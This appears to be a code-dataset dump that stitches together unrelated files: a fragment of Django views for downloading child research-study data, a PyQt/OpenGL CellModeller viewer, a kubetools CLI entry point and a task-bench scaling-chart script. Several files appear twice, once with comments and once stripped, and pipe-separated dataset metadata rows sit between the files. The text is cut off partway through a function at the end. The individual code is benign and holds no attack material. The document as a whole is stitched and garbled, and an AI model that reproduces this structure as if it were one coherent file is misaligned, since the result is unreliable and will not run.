    # responses in memory while streaming.
    paginate_by = 1

    def make_chunk(self, paginator, page_num, header_options):
        """Serialize one page of responses as a JSON fragment, adding the
        opening '[' on the first page and the closing ']' on the last."""
        chunk = ""
        if page_num == 1:
            chunk = "[\n"
        chunk += ",\n".join(
            json.dumps(
                construct_response_dictionary(resp, RESPONSE_COLUMNS, header_options),
                indent="\t",  # Use tab rather than spaces to make file smaller (ex. 60MB -> 25MB)
                default=str,
            )
            for resp in paginator.page(page_num)
        )
        if page_num == paginator.page_range[-1]:
            chunk += "\n]"
        else:
            chunk += ",\n"
        return chunk

    def render_to_response(self, context, **response_kwargs):
        """Return a StreamingHttpResponse that emits one chunk per page."""
        paginator = context["paginator"]
        study = self.study
        header_options = set(self.request.GET.getlist("data_options"))
        # Mark the file "-identifiable" when any identifiable column was requested.
        filename = "{}_{}.json".format(
            study_name_for_files(study.name),
            "all-responses"
            + ("-identifiable" if IDENTIFIABLE_DATA_HEADERS & header_options else ""),
        )
        response = StreamingHttpResponse(
            (
                self.make_chunk(paginator, page_num, header_options)
                for page_num in paginator.page_range
            ),
            content_type="text/json",
        )
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyResponsesCSV(ResponseDownloadMixin, generic.list.ListView):
    """Downloads all responses for a study as one CSV file."""

    def render_to_response(self, context, **response_kwargs):
        """Flatten every response to a row, collecting the union of headers
        across all rows (responses may have differing keys), then emit CSV."""
        paginator = context["paginator"]
        study = self.study
        headers = set()
        session_list = []
        for page_num in paginator.page_range:
            page_of_responses = paginator.page(page_num)
            for resp in page_of_responses:
                row_data = flatten_dict(
                    {col.id: col.extractor(resp) for col in RESPONSE_COLUMNS}
                )
                # Add any new headers from this session
                headers = headers | row_data.keys()
                session_list.append(row_data)
        header_options = set(self.request.GET.getlist("data_options"))
        header_list = get_response_headers(header_options, headers)
        output, writer = csv_dict_output_and_writer(header_list)
        writer.writerows(session_list)
        cleaned_data = output.getvalue()
        # Mark the file "-identifiable" when any identifiable column was requested.
        filename = "{}_{}.csv".format(
            study_name_for_files(study.name),
            "all-responses"
            + ("-identifiable" if IDENTIFIABLE_DATA_HEADERS & header_options else ""),
        )
        response = HttpResponse(cleaned_data, content_type="text/csv")
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyResponsesDictCSV(CanViewStudyResponsesMixin, View):
    """Serves a CSV data dictionary (column name + description) matching the
    columns of the all-responses CSV download."""

    def build_summary_dict_csv(self, optional_headers_selected_ids):
        """Return CSV text with one (column, description) row per header that
        would appear in the responses download for the selected options."""
        descriptions = {col.id: col.description for col in RESPONSE_COLUMNS}
        rows = [
            {"column": header, "description": descriptions[header]}
            for header in get_response_headers(
                optional_headers_selected_ids, descriptions.keys()
            )
        ]
        output, writer = csv_dict_output_and_writer(["column", "description"])
        writer.writerows(rows)
        return output.getvalue()

    def get(self, request, *args, **kwargs):
        """Return the data dictionary as a CSV attachment."""
        selected_options = self.request.GET.getlist("data_options")
        csv_text = self.build_summary_dict_csv(selected_options)
        filename = "{}_{}.csv".format(
            study_name_for_files(self.study.name), "all-responses-dict"
        )
        response = HttpResponse(csv_text, content_type="text/csv")
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyChildrenCSV(ResponseDownloadMixin, generic.list.ListView):
    """Downloads identifiable data about each unique child who participated,
    one row per child (deduplicated across their responses)."""

    def render_to_response(self, context, **response_kwargs):
        paginator = context["paginator"]
        study = self.study
        child_list = []
        session_list = []
        for page_num in paginator.page_range:
            page_of_responses = paginator.page(page_num)
            for resp in page_of_responses:
                row_data = flatten_dict(
                    {
                        col.id: col.extractor(resp)
                        for col in RESPONSE_COLUMNS
                        if col.id in CHILD_CSV_HEADERS
                    }
                )
                # Only emit one row per child: skip responses from a child
                # we've already seen.
                if row_data["child__global_id"] not in child_list:
                    child_list.append(row_data["child__global_id"])
                    session_list.append(row_data)
        output, writer = csv_dict_output_and_writer(CHILD_CSV_HEADERS)
        writer.writerows(session_list)
        cleaned_data = output.getvalue()
        filename = "{}_{}.csv".format(
            study_name_for_files(study.name), "all-children-identifiable"
        )
        response = HttpResponse(cleaned_data, content_type="text/csv")
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyChildrenDictCSV(CanViewStudyResponsesMixin, View):
    """Serves a CSV data dictionary for the per-child summary download."""

    def build_child_dict_csv(self):
        """Return CSV text describing each column listed in CHILD_CSV_HEADERS."""
        rows = [
            {"column": col.id, "description": col.description}
            for col in RESPONSE_COLUMNS
            if col.id in CHILD_CSV_HEADERS
        ]
        output, writer = csv_dict_output_and_writer(["column", "description"])
        writer.writerows(rows)
        return output.getvalue()

    def get(self, request, *args, **kwargs):
        """Return the child data dictionary as a CSV attachment."""
        csv_text = self.build_child_dict_csv()
        filename = "{}_{}.csv".format(
            study_name_for_files(self.study.name), "all-children-dict"
        )
        response = HttpResponse(csv_text, content_type="text/csv")
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyResponsesFrameDataCSV(ResponseDownloadMixin, generic.list.ListView):
    """Downloads per-response frame-data CSVs bundled into one zip archive."""

    # TODO: with large files / many responses generation can take a while. Should generate asynchronously along
    # with the data dict.
    def render_to_response(self, context, **response_kwargs):
        paginator = context["paginator"]
        study = self.study
        # External studies have no frame data to export.
        if study.study_type.is_external:
            messages.error(
                self.request, "Frame data is not available for External Studies."
            )
            return redirect(reverse("exp:study-responses-all", kwargs={"pk": study.pk}))

        # Build the zip entirely in memory.
        zipped_file = io.BytesIO()
        with zipfile.ZipFile(zipped_file, "w", zipfile.ZIP_DEFLATED) as zipped:
            for page_num in paginator.page_range:
                page_of_responses = paginator.page(page_num)
                for resp in page_of_responses:
                    data = build_single_response_framedata_csv(resp)
                    filename = "{}_{}_{}.csv".format(
                        study_name_for_files(study.name), resp.uuid, "frames"
                    )
                    zipped.writestr(filename, data)
        # Rewind so FileResponse streams from the beginning.
        zipped_file.seek(0)
        response = FileResponse(
            zipped_file,
            as_attachment=True,
            filename="{}_framedata_per_session.zip".format(
                study_name_for_files(study.name)
            ),
        )
        return response
class StudyResponsesFrameDataDictCSV(ResponseDownloadMixin, View):
    """Kicks off asynchronous generation of the frame-data dictionary CSV;
    the user is emailed a link when it is ready."""

    def get(self, request, *args, **kwargs):
        study = self.study
        if study.study_type.is_external:
            messages.error(
                request, "Frame data dictionary is not available for external studies"
            )
        else:
            filename = "{}_{}_{}".format(
                study_name_for_files(study.name), study.uuid, "all-frames-dict"
            )
            # Celery task; delivery happens out-of-band via email.
            build_framedata_dict.delay(filename, study.uuid, self.request.user.uuid)
            messages.success(
                request,
                f"A frame data dictionary for {study.name} is being generated. You will be emailed a link when it's completed.",
            )
        return HttpResponseRedirect(
            reverse("exp:study-responses-all", kwargs=self.kwargs)
        )
class StudyDemographics(
    CanViewStudyResponsesMixin, SingleObjectFetchProtocol[Study], generic.DetailView
):
    """Landing page for demographic snapshot downloads for a study."""

    template_name = "studies/study_demographics.html"
    queryset = Study.objects.all()

    def get_context_data(self, **kwargs):
        """Add the viewable-response count and permission flags for the template."""
        context = super().get_context_data(**kwargs)
        context["n_responses"] = (
            context["study"].responses_for_researcher(self.request.user).count()
        )
        context["can_view_regular_responses"] = self.request.user.has_study_perms(
            StudyPermission.READ_STUDY_RESPONSE_DATA, context["study"]
        )
        context["can_view_preview_responses"] = self.request.user.has_study_perms(
            StudyPermission.READ_STUDY_PREVIEW_DATA, context["study"]
        )
        return context
class StudyDemographicsJSON(DemographicDownloadMixin, generic.list.ListView):
    """Downloads all demographic snapshots for a study as a JSON array."""

    def render_to_response(self, context, **response_kwargs):
        study = self.study
        header_options = self.request.GET.getlist("demo_options")
        json_responses = []
        paginator = context["paginator"]
        for page_num in paginator.page_range:
            page_of_responses = paginator.page(page_num)
            for resp in page_of_responses:
                json_responses.append(
                    json.dumps(
                        construct_response_dictionary(
                            resp,
                            DEMOGRAPHIC_COLUMNS,
                            header_options,
                            # Demographic download excludes experiment data.
                            include_exp_data=False,
                        ),
                        indent="\t",
                        default=str,
                    )
                )
        cleaned_data = f"[ {', '.join(json_responses)} ]"
        filename = "{}_{}.json".format(
            study_name_for_files(study.name), "all-demographic-snapshots"
        )
        response = HttpResponse(cleaned_data, content_type="text/json")
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyDemographicsCSV(DemographicDownloadMixin, generic.list.ListView):
    """Downloads all demographic snapshots for a study as CSV."""

    def render_to_response(self, context, **response_kwargs):
        study = self.study
        paginator = context["paginator"]
        header_options = set(self.request.GET.getlist("demo_options"))
        participant_list = []
        headers_for_download = get_demographic_headers(header_options)
        for page_num in paginator.page_range:
            page_of_responses = paginator.page(page_num)
            for resp in page_of_responses:
                # Extract every column; the writer only keeps headers_for_download.
                row_data = {col.id: col.extractor(resp) for col in DEMOGRAPHIC_COLUMNS}
                participant_list.append(row_data)
        output, writer = csv_dict_output_and_writer(headers_for_download)
        writer.writerows(participant_list)
        cleaned_data = output.getvalue()
        filename = "{}_{}.csv".format(
            study_name_for_files(study.name), "all-demographic-snapshots"
        )
        response = HttpResponse(cleaned_data, content_type="text/csv")
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyDemographicsDictCSV(DemographicDownloadMixin, generic.list.ListView):
    """Serves a CSV data dictionary for the demographic snapshot downloads."""

    def render_to_response(self, context, **response_kwargs):
        """Emit one (column, description) row per demographic header that
        would appear in the download for the selected options."""
        selected_options = set(self.request.GET.getlist("demo_options"))
        download_headers = get_demographic_headers(selected_options)
        rows = [
            {"column": col.id, "description": col.description}
            for col in DEMOGRAPHIC_COLUMNS
            if col.id in download_headers
        ]
        output, writer = csv_dict_output_and_writer(["column", "description"])
        writer.writerows(rows)
        filename = "{}_{}.csv".format(
            study_name_for_files(self.study.name), "all-demographic-snapshots-dict"
        )
        response = HttpResponse(output.getvalue(), content_type="text/csv")
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyCollisionCheck(ResponseDownloadMixin, View):
    """Checks whether any two distinct participants/children hash to the same
    short hashed ID for this study, returning collisions as JSON text."""

    def get(self, request, *args, **kwargs):
        study = self.study
        responses = (
            study.consented_responses.order_by("id")
            .select_related("child", "child__user", "study")
            .values(
                "uuid",
                "child__uuid",
                "child__user__uuid",
                "study__uuid",
                "study__salt",
                "study__hash_digits",
            )
        )
        # Map hashed id -> first global uuid seen; a different uuid under the
        # same hash is a collision.
        child_dict = {}
        account_dict = {}
        collision_text = ""
        paginator = Paginator(responses, RESPONSE_PAGE_SIZE)
        for page_num in paginator.page_range:
            page_of_responses = paginator.page(page_num)
            for resp in page_of_responses:
                participant_hashed_id = hash_participant_id(resp)
                participant_global_id = resp["child__user__uuid"]
                child_hashed_id = hash_child_id(resp)
                child_global_id = resp["child__uuid"]
                if participant_hashed_id in account_dict:
                    if participant_global_id != account_dict[participant_hashed_id]:
                        collision_text += "Participant hashed ID {} ({}, {})\n".format(
                            participant_hashed_id,
                            account_dict[participant_hashed_id],
                            participant_global_id,
                        )
                else:
                    account_dict[participant_hashed_id] = participant_global_id
                if child_hashed_id in child_dict:
                    if child_global_id != child_dict[child_hashed_id]:
                        # NOTE(review): participant collisions use "\n" but child
                        # collisions use "<br>" — looks inconsistent; confirm which
                        # separator the consumer of this JSON expects.
                        collision_text += "Child hashed ID {} ({}, {})<br>".format(
                            child_hashed_id,
                            child_dict[child_hashed_id],
                            child_global_id,
                        )
                else:
                    child_dict[child_hashed_id] = child_global_id
        return JsonResponse({"collisions": collision_text})
class StudyAttachments(CanViewStudyResponsesMixin, generic.ListView):
    """Lists video attachments for consented responses, with filtering and
    bulk zip-archive generation (delivered by email)."""

    template_name = "studies/study_attachments.html"
    model = Video
    paginate_by = 100

    def get_ordering(self):
        # The `or` guards against an explicitly empty ?sort= parameter.
        return self.request.GET.get("sort", "-created_at") or "-created_at"

    def get_queryset(self):
        """Videos from consented responses, restricted to preview or regular
        responses according to the user's permissions, optionally filtered by
        a filename substring match."""
        study = self.study
        videos = study.videos_for_consented_responses
        if not self.request.user.has_study_perms(
            StudyPermission.READ_STUDY_RESPONSE_DATA, study
        ):
            videos = videos.filter(response__is_preview=True)
        if not self.request.user.has_study_perms(
            StudyPermission.READ_STUDY_PREVIEW_DATA, study
        ):
            videos = videos.filter(response__is_preview=False)
        match = self.request.GET.get("match", "")
        if match:
            videos = videos.filter(full_name__icontains=match)
        return videos.order_by(self.get_ordering())

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        context["match"] = self.request.GET.get("match", "")
        context["study"] = self.study
        return context

    def post(self, request, *args, **kwargs):
        """Queue async zip-archive builds for all videos and/or consent-only
        videos, depending on which buttons were submitted."""
        match = self.request.GET.get("match", "")
        study = self.study
        if self.request.POST.get("all-attachments"):
            build_zipfile_of_videos.delay(
                f"{study.uuid}_videos",
                study.uuid,
                match,
                self.request.user.uuid,
                consent_only=False,
            )
            messages.success(
                request,
                f"An archive of videos for {study.name} is being generated. You will be emailed a link when it's completed.",
            )
        if self.request.POST.get("all-consent-videos"):
            build_zipfile_of_videos.delay(
                f"{study.uuid}_consent_videos",
                study.uuid,
                match,
                self.request.user.uuid,
                consent_only=True,
            )
            messages.success(
                request,
                f"An archive of consent videos for {study.name} is being generated. You will be emailed a link when it's completed.",
            )
        return HttpResponseRedirect(
            reverse("exp:study-attachments", kwargs=self.kwargs)
        )
| true | true |
f72edc7d2c194fe94d3f029b4088fafe7afdce75 | 3,944 | py | Python | CellModeller/GUI/PyGLCMViewer.py | pakpoomton/CellmodellerShadow | c3fdc0aa41ca2cbd56a3eae168e27312a5c0c185 | [
"BSD-3-Clause"
] | null | null | null | CellModeller/GUI/PyGLCMViewer.py | pakpoomton/CellmodellerShadow | c3fdc0aa41ca2cbd56a3eae168e27312a5c0c185 | [
"BSD-3-Clause"
] | null | null | null | CellModeller/GUI/PyGLCMViewer.py | pakpoomton/CellmodellerShadow | c3fdc0aa41ca2cbd56a3eae168e27312a5c0c185 | [
"BSD-3-Clause"
] | null | null | null | import PyQt4
from PyQt4 import QtCore, QtGui
from PyQt4.Qt import Qt
from PyQt4.QtCore import QObject, QTimer, pyqtSignal, pyqtSlot
from PyGLWidget import PyGLWidget
from OpenGL.GL import *
from OpenGL.GLU import *
from CellModeller.Regulation import ModuleRegulator
from CellModeller.Simulator import Simulator
from CellModeller.CellState import CellState
import os
import sys
class PyGLCMViewer(PyGLWidget):
    """OpenGL widget that drives and renders a CellModeller simulation,
    with play/record controls and per-cell selection via GL picking."""

    # Emits a text summary of the currently selected cell's state.
    selectedCell = pyqtSignal(str)
    selectedName = -1  # GL pick name of the selected cell; -1 = nothing selected
    dt = 0.25  # simulation time step

    def __init__(self, parent=None):
        PyGLWidget.__init__(self, parent)
        # Timer with 0 ms interval: step the simulation as fast as the event
        # loop allows while "run" is toggled on.
        self.animTimer = QTimer()
        self.animTimer.timeout.connect(self.animate)
        self.renderInfo = None
        self.sim = None
        self.modfile = None
        self.record = False
        self.set_radius(32)
        self.frameNo = 0

    def help(self):
        pass

    def setSimulator(self, sim):
        self.sim = sim

    @pyqtSlot(bool)
    def toggleRun(self, run):
        """Start/stop continuous simulation stepping."""
        if run:
            self.animTimer.start(0)
        else:
            self.animTimer.stop()

    @pyqtSlot(bool)
    def toggleRecord(self, rec):
        """Toggle snapshot recording and simulator pickling."""
        self.record = rec
        self.sim.savePickle = rec

    @pyqtSlot()
    def reset(self):
        # NOTE(review): assumes loadFile() has already set self.modname;
        # calling reset before loading a module would raise AttributeError.
        self.sim = Simulator(self.modname, self.dt)
        self.frameNo = 0

    @pyqtSlot()
    def load(self):
        """Prompt for a Python model module and load it."""
        qs = QtGui.QFileDialog.getOpenFileName(self, 'Load Python module', '', '*.py')
        self.modfile = str(qs)
        self.loadFile(self.modfile)

    def loadFile(self, modstr):
        """Load (or reload) the model module at path `modstr` into a Simulator."""
        (path, name) = os.path.split(modstr)
        modname = str(name).split('.')[0]
        self.modname = modname
        # Make the module importable by the Simulator.
        sys.path.append(path)
        if self.sim:
            self.sim.reset(modname)
        else:
            self.sim = Simulator(modname, self.dt)
        self.paintGL()

    def animate(self):
        """One timer tick: advance the simulation and optionally snapshot."""
        if self.sim:
            self.sim.step()
            self.updateSelectedCell()
            self.frameNo += 1
        if self.record:
            # Snapshot every 5th frame to limit output volume.
            if (self.frameNo % 5) == 0:
                self.setSnapshotCounter(self.frameNo)
                self.saveSnapshot()

    def updateSelectedCell(self):
        """Emit a text dump of the selected cell's state and refresh the view
        every 100 simulation steps."""
        if self.sim:
            states = self.sim.cellStates
            cid = self.selectedName
            txt = ''
            # BUGFIX: dict.has_key() was removed in Python 3; the `in`
            # operator is equivalent and works on Python 2 as well.
            if cid in states:
                s = states[cid]
                for (name, val) in s.__dict__.items():
                    if name not in CellState.excludeAttr:
                        vals = str(val)
                        txt = txt + name + ': ' + vals + '\n'
            self.selectedCell.emit(txt)
            if self.sim.stepNum % 100 == 0:
                self.updateGL()

    def postSelection(self, name):
        """Called by PyGLWidget after GL picking resolves a cell name."""
        self.selectedName = name
        self.updateSelectedCell()

    def paintGL(self):
        PyGLWidget.paintGL(self)
        glClearColor(0.5, 0.5, 0.5, 0.0)
        glClear(GL_COLOR_BUFFER_BIT)
        glMatrixMode(GL_MODELVIEW)
        glPushMatrix()
        if self.sim:
            for r in self.sim.renderers:
                if r != None:
                    r.render_gl(self.selectedName)
        glPopMatrix()

    def drawWithNames(self):
        """Render with GL pick names so postSelection can identify cells."""
        glMatrixMode(GL_MODELVIEW)
        glPushMatrix()
        if self.sim:
            for r in self.sim.renderers:
                if r:
                    r.renderNames_gl()
        glPopMatrix()
class RenderInfo:
    """Holds the list of active renderers and the global draw scale."""

    def __init__(self):
        # Start from the reset state: no renderers, unit scale.
        self.reset()

    def addRenderer(self, renderer):
        """Register an additional renderer."""
        self.renderers.append(renderer)

    def reset(self):
        """Drop all renderers and restore the default scale."""
        self.renderers = []
        self.scale = 1.0

    def setScale(self, s):
        """Set the global draw scale."""
        self.scale = s
| 26.648649 | 86 | 0.556288 | import PyQt4
from PyQt4 import QtCore, QtGui
from PyQt4.Qt import Qt
from PyQt4.QtCore import QObject, QTimer, pyqtSignal, pyqtSlot
from PyGLWidget import PyGLWidget
from OpenGL.GL import *
from OpenGL.GLU import *
from CellModeller.Regulation import ModuleRegulator
from CellModeller.Simulator import Simulator
from CellModeller.CellState import CellState
import os
import sys
class PyGLCMViewer(PyGLWidget):
    """OpenGL widget that drives and renders a CellModeller simulation,
    with play/record controls and per-cell selection via GL picking."""

    # Emits a text summary of the currently selected cell's state.
    selectedCell = pyqtSignal(str)
    selectedName = -1  # GL pick name of the selected cell; -1 = nothing selected
    dt = 0.25  # simulation time step
    def __init__(self, parent = None):
        PyGLWidget.__init__(self,parent)
        # 0 ms timer: step the simulation as fast as the event loop allows.
        self.animTimer = QTimer()
        self.animTimer.timeout.connect(self.animate)
        self.renderInfo = None
        self.sim= None
        self.modfile = None
        self.record = False
        self.set_radius(32)
        self.frameNo = 0
    def help(self):
        pass
    def setSimulator(self, sim):
        self.sim = sim
    @pyqtSlot(bool)
    def toggleRun(self, run):
        # Start/stop continuous simulation stepping.
        if run:
            self.animTimer.start(0)
        else:
            self.animTimer.stop()
    @pyqtSlot(bool)
    def toggleRecord(self, rec):
        # Toggle snapshot recording and simulator pickling.
        self.record = rec
        self.sim.savePickle = rec
    @pyqtSlot()
    def reset(self):
        # NOTE(review): assumes loadFile() already set self.modname; calling
        # reset before loading a module would raise AttributeError.
        self.sim = Simulator(self.modname, self.dt)
        self.frameNo = 0
    @pyqtSlot()
    def load(self):
        # Prompt for a Python model module and load it.
        qs = QtGui.QFileDialog.getOpenFileName(self, 'Load Python module', '', '*.py')
        self.modfile = str(qs)
        self.loadFile(self.modfile)
    def loadFile(self, modstr):
        # Load (or reload) the model module at path `modstr` into a Simulator.
        (path,name) = os.path.split(modstr)
        modname = str(name).split('.')[0]
        self.modname = modname
        sys.path.append(path)
        if self.sim:
            self.sim.reset(modname)
        else:
            self.sim = Simulator(modname, self.dt)
        self.paintGL()
    def animate(self):
        # One timer tick: advance the simulation; snapshot every 5th frame
        # when recording.
        if self.sim:
            self.sim.step()
            self.updateSelectedCell()
            self.frameNo += 1
        if self.record:
            if (self.frameNo%5)==0:
                self.setSnapshotCounter(self.frameNo)
                self.saveSnapshot()
    def updateSelectedCell(self):
        # Emit a text dump of the selected cell's state; refresh the view
        # every 100 steps.
        # NOTE(review): dict.has_key() is Python-2-only (removed in Py3);
        # `cid in states` would be the portable equivalent.
        if self.sim:
            states = self.sim.cellStates
            cid = self.selectedName
            txt = ''
            if states.has_key(cid):
                s = states[cid]
                for (name,val) in s.__dict__.items():
                    if name not in CellState.excludeAttr:
                        vals = str(val)
                        txt = txt + name + ': ' + vals + '\n'
            self.selectedCell.emit(txt)
            if self.sim.stepNum%100==0:
                self.updateGL()
    def postSelection(self, name):
        # Called by PyGLWidget after GL picking resolves a cell name.
        self.selectedName = name
        self.updateSelectedCell()
    def paintGL(self):
        PyGLWidget.paintGL(self)
        glClearColor(0.5,0.5,0.5,0.0)
        glClear(GL_COLOR_BUFFER_BIT)
        glMatrixMode(GL_MODELVIEW)
        glPushMatrix()
        if self.sim:
            for r in self.sim.renderers:
                if r != None:
                    r.render_gl(self.selectedName)
        glPopMatrix()
    def drawWithNames(self):
        # Render with GL pick names so postSelection can identify cells.
        glMatrixMode(GL_MODELVIEW)
        glPushMatrix()
        if self.sim:
            for r in self.sim.renderers:
                if r:
                    r.renderNames_gl()
        glPopMatrix()
class RenderInfo:
    """Holds the list of active renderers and the global draw scale."""

    def __init__(self):
        # Start from the reset state: no renderers, unit scale.
        self.reset()

    def addRenderer(self, renderer):
        """Register an additional renderer."""
        self.renderers.append(renderer)

    def reset(self):
        """Drop all renderers and restore the default scale."""
        self.renderers = []
        self.scale = 1.0

    def setScale(self, s):
        """Set the global draw scale."""
        self.scale = s
| true | true |
f72edcdbbb2b57a739aa3dd65eb9b81da1a7a756 | 245 | py | Python | kubetools/dev/__main__.py | EDITD/kubetools | 3a87ed3b233aed152af9e52a4c1d5844a9c26437 | [
"MIT"
] | 5 | 2020-04-20T21:24:14.000Z | 2022-01-29T15:35:02.000Z | kubetools/dev/__main__.py | EDITD/kubetools | 3a87ed3b233aed152af9e52a4c1d5844a9c26437 | [
"MIT"
] | 69 | 2019-12-17T16:16:21.000Z | 2022-03-23T11:19:49.000Z | kubetools/dev/__main__.py | EDITD/kubetools | 3a87ed3b233aed152af9e52a4c1d5844a9c26437 | [
"MIT"
] | 1 | 2022-01-14T04:12:15.000Z | 2022-01-14T04:12:15.000Z | #!/usr/bin/env python
# Entry point for `python -m kubetools.dev`: importing the submodules below
# registers their click commands on the `dev` group before it runs.
from kubetools.dev import dev
from kubetools.main import run_cli
# Import click command groups
from kubetools.dev import (  # noqa: F401, I100, I202
    container,
    environment,
    logs,
    scripts,
)
run_cli(dev)
| 15.3125 | 53 | 0.706122 |
# Entry point for `python -m kubetools.dev`: importing the submodules below
# registers their click commands on the `dev` group before it runs.
from kubetools.dev import dev
from kubetools.main import run_cli
# Imported for their side effect of registering click command groups.
from kubetools.dev import (
container,
environment,
logs,
scripts,
)
run_cli(dev)
| true | true |
f72edd75707f96cb22c318119a9cfc892b3341ff | 4,296 | py | Python | scripts/strong.py | gonidelis/task-bench | 06f1adef6183405bec0a267c686fb67baeafc8d1 | [
"Apache-2.0"
] | 23 | 2018-08-31T03:51:08.000Z | 2021-10-21T08:01:44.000Z | scripts/strong.py | gonidelis/task-bench | 06f1adef6183405bec0a267c686fb67baeafc8d1 | [
"Apache-2.0"
] | 30 | 2018-06-27T19:45:53.000Z | 2022-03-23T04:26:11.000Z | scripts/strong.py | gonidelis/task-bench | 06f1adef6183405bec0a267c686fb67baeafc8d1 | [
"Apache-2.0"
] | 26 | 2018-05-29T22:56:59.000Z | 2022-01-27T18:54:26.000Z | #!/usr/bin/env python3
# Copyright 2020 Stanford University
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
import collections
import csv
import os
import sys
import chart_util as util
class Parser(util.Parser):
    """Collects strong-scaling results (best elapsed time per node count and
    problem size, plus minimum METG) and writes them to stdout as CSV."""

    def __init__(self, ngraphs, dependence, system, max_problem_size, min_problem_size, csv_dialect):
        self.ngraphs = ngraphs
        # Dependence types are recorded with spaces in the data files.
        self.dependence = dependence.replace('_', ' ')
        self.system = system
        self.max_problem_size = int(max_problem_size) if max_problem_size is not None else None
        self.min_problem_size = int(min_problem_size) if min_problem_size is not None else None
        self.csv_dialect = csv_dialect
        self.header = []
        # table[nodes][column] = best (minimum) elapsed time seen so far.
        self.table = collections.defaultdict(lambda: collections.defaultdict(lambda: float('inf')))
        # metg[nodes] = minimum METG seen so far (only used in per-system mode).
        self.metg = collections.defaultdict(lambda: float('inf'))
    def filter(self, row):
        """Keep rows matching the requested graph count, dependence type, and
        (when given) system name."""
        return row['ngraphs'] == self.ngraphs and row['type'] == self.dependence and (self.system is None or row['name'] == self.system)
    def process(self, row, data, metg=None):
        """Fold one result row into the table, keeping the minimum elapsed time.

        Columns are problem sizes when a single system was requested,
        otherwise system names.
        """
        if self.system is not None:
            assert metg is not None
            self.metg[row['nodes']] = min(metg, self.metg[row['nodes']], key=float)
        for values in zip(*list(data.values())):
            items = dict(zip(data.keys(), values))
            # Total problem size = iterations per node * node count.
            iterations = row['nodes'] * items['iterations']
            if (self.max_problem_size is None or iterations <= self.max_problem_size) and (self.min_problem_size is None or self.min_problem_size <= iterations):
                name = iterations if self.system is not None else row['name']
                if name not in self.header:
                    self.header.append(name)
                self.table[row['nodes']][name] = min(
                    items['elapsed'],
                    self.table[row['nodes']][name],
                    key=float)
    def error_value(self):
        return {}
    def complete(self):
        """Write the accumulated table as CSV to stdout."""
        # FIXME: This isn't actually the criteria we'd like to sort on,
        # we'd prefer to sort so that the list of names roughly parallels
        # the order of the bars in the graph.
        self.header.sort()
        if self.system is not None:
            self.header.reverse()
        self.header.insert(0, 'nodes')
        if self.system is not None:
            self.header.append('metg')
        out = csv.DictWriter(sys.stdout, self.header, dialect=self.csv_dialect)
        out.writeheader()
        for nodes in sorted(self.table.keys()):
            row = self.table[nodes]
            # Missing entries (still infinity) become empty cells.
            row = {k: None if v == float('inf') else v for k, v in row.items()}
            row['nodes'] = nodes
            if self.system is not None:
                row['metg'] = self.metg[nodes]
            out.writerow(row)
def driver(ngraphs, dependence, system, max_problem_size, min_problem_size, machine, resource, threshold, csv_dialect, verbose):
    """Build a Parser for the requested data slice and run it over the machine's results."""
    Parser(ngraphs, dependence, system,
           max_problem_size, min_problem_size, csv_dialect).parse(
        machine, resource, threshold, False, verbose)
if __name__ == '__main__':
    # Command-line front end; every flag maps onto a driver() keyword argument.
    cli = argparse.ArgumentParser()
    cli.add_argument('-g', '--ngraphs', type=int, required=True)
    cli.add_argument('-d', '--dependence', required=True)
    cli.add_argument('-s', '--system')
    cli.add_argument('--max-problem-size')
    cli.add_argument('--min-problem-size')
    cli.add_argument('-m', '--machine', required=True)
    cli.add_argument('-r', '--resource', default='flops')
    cli.add_argument('-t', '--threshold', type=float, default=0.5)
    cli.add_argument('--csv-dialect', default='excel-tab')
    cli.add_argument('-v', '--verbose', action='store_true')
    driver(**vars(cli.parse_args()))
| 40.914286 | 162 | 0.649209 |
import argparse
import collections
import csv
import os
import sys
import chart_util as util
class Parser(util.Parser):
    """Accumulates strong-scaling results into a per-node-count table of best
    (minimum) elapsed times, then emits it as CSV on stdout."""
    def __init__(self, ngraphs, dependence, system, max_problem_size, min_problem_size, csv_dialect):
        self.ngraphs = ngraphs
        # Dependence types are stored with spaces in the data files.
        self.dependence = dependence.replace('_', ' ')
        self.system = system
        self.max_problem_size = int(max_problem_size) if max_problem_size is not None else None
        self.min_problem_size = int(min_problem_size) if min_problem_size is not None else None
        self.csv_dialect = csv_dialect
        self.header = []
        # table[nodes][column] -> best elapsed time seen so far (inf = no data yet).
        self.table = collections.defaultdict(lambda: collections.defaultdict(lambda: float('inf')))
        # metg[nodes] -> best (minimum) METG value seen so far.
        self.metg = collections.defaultdict(lambda: float('inf'))
    def filter(self, row):
        """Keep rows matching the requested graph count, dependence type and system."""
        return row['ngraphs'] == self.ngraphs and row['type'] == self.dependence and (self.system is None or row['name'] == self.system)
    def process(self, row, data, metg=None):
        """Fold one result row into the table, keeping minima per cell."""
        if self.system is not None:
            assert metg is not None
            self.metg[row['nodes']] = min(metg, self.metg[row['nodes']], key=float)
        for values in zip(*list(data.values())):
            items = dict(zip(data.keys(), values))
            # Total problem size scales with the node count.
            iterations = row['nodes'] * items['iterations']
            if (self.max_problem_size is None or iterations <= self.max_problem_size) and (self.min_problem_size is None or self.min_problem_size <= iterations):
                # Columns are problem sizes when a single system is selected,
                # otherwise system names.
                name = iterations if self.system is not None else row['name']
                if name not in self.header:
                    self.header.append(name)
                self.table[row['nodes']][name] = min(
                    items['elapsed'],
                    self.table[row['nodes']][name],
                    key=float)
    def error_value(self):
        """Placeholder recorded for a data point that could not be parsed."""
        return {}
    def complete(self):
        """Write the accumulated table to stdout as CSV."""
        # FIXME: This isn't the ideal sort criterion; we'd prefer an order that
        # roughly parallels the order of the bars in the graph.
        self.header.sort()
        if self.system is not None:
            self.header.reverse()
        self.header.insert(0, 'nodes')
